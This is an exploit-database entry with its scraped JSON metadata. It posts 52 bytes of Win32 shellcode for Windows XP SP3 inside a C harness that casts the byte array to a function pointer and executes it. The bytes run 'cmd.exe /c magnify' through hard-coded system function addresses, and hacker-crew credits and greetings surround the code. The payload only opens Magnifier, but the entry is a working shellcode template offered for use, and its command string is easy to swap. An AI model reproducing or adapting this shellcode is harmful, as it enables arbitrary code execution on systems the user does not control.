ID 1337DAY-ID-16015
Type zdt
Reporter ^Xecuti0N3r
Modified 2011-05-03T00:00:00
Description
Exploit for win32 platform in category shellcode
#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31"
"\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6d\x61\x67\x6e\x69\x66\x79";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
____________________________________________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
(+)Gr33ts to : Liyan Oz and team at 0nto.me , exploit-id.com , packetstormsecurity.org , securityreason.com
########################################################################
# 0day.today [2018-04-09] #
{"id": "1337DAY-ID-16015", "lastseen": "2018-04-09T11:41:12", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-09T11:41:12", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/BROWSER/SAFARI_USER_ASSISTED_DOWNLOAD_LAUNCH", "MSF:EXPLOIT/MULTI/BROWSER/MSFD_RCE_BROWSER", "MSF:EXPLOIT/WINDOWS/BROWSER/X360_VIDEO_PLAYER_SET_TEXT_BOF", "MSF:EXPLOIT/WINDOWS/BROWSER/HP_ALM_XGO_SETSHAPENODETYPE_EXEC", "MSF:EXPLOIT/ANDROID/BROWSER/SAMSUNG_KNOX_SMDM_URL", "MSF:EXPLOIT/WINDOWS/BROWSER/MAXTHON_HISTORY_XCS"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16015"]}], "modified": "2018-04-09T11:41:12", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16015", "description": "Exploit for win32 platform in category shellcode", "title": "win32/xp sp3 Windows Magnifier Shellcode 52 bytes", "cvelist": [], "sourceData": "#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes\r\n#(+) Author : ^Xecuti0n3r\r\n#(+) E-mail : xecuti0n3r()yahoo.com\r\n#(+) Category : win32-Shellcodes\r\n#(+) Tested on : Windows Xp 32 bit\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n\r\nCode:\r\n____________________________________________________________________________________________________\r\n____________________________________________________________________________________________________\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\nint main(){\r\n\r\n unsigned char shellcode[]=\r\n \"\\xeb\\x1b\\x5b\\x31\\xc0\\x50\\x31\"\r\n\t\"\\xc0\\x88\\x43\\x35\\x53\\xbb\\xad\\x23\\x86\\x7c\"\r\n \"\\xff\\xd3\\x31\\xc0\\x50\\xbb\\xfa\\xca\\x81\\x7c\\xff\\xd3\\xe8\\xe0\\xff\\xff\\xff\"\r\n \"\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x20\\x2f\\x63\\x20\"\r\n\t\"\\x6d\\x61\\x67\\x6e\\x69\\x66\\x79\";\r\n\r\n\r\n printf(\"Size = %d bytes\\n\", strlen(shellcode));\r\n\r\n ((void (*)())shellcode)();\r\n\r\n return 0;\r\n}\r\n\r\n\r\n____________________________________________________________________________________________________\r\n\r\n########################################################################\r\n(+)Exploit Coded by: ^Xecuti0N3r \r\n(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r\r\n(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)\r\n(+)<3 to :Indian Cyber Army & Indishell Crew\r\n(+)Gr33ts to : Liyan Oz and team at 0nto.me , exploit-id.com , packetstormsecurity.org , securityreason.com\r\n########################################################################\r\n\r\n\n\n# 0day.today [2018-04-09] #", "published": "2011-05-03T00:00:00", "references": [], "reporter": "^Xecuti0N3r", "modified": "2011-05-03T00:00:00", "href": "https://0day.today/exploit/description/16015", "immutableFields": []}
{}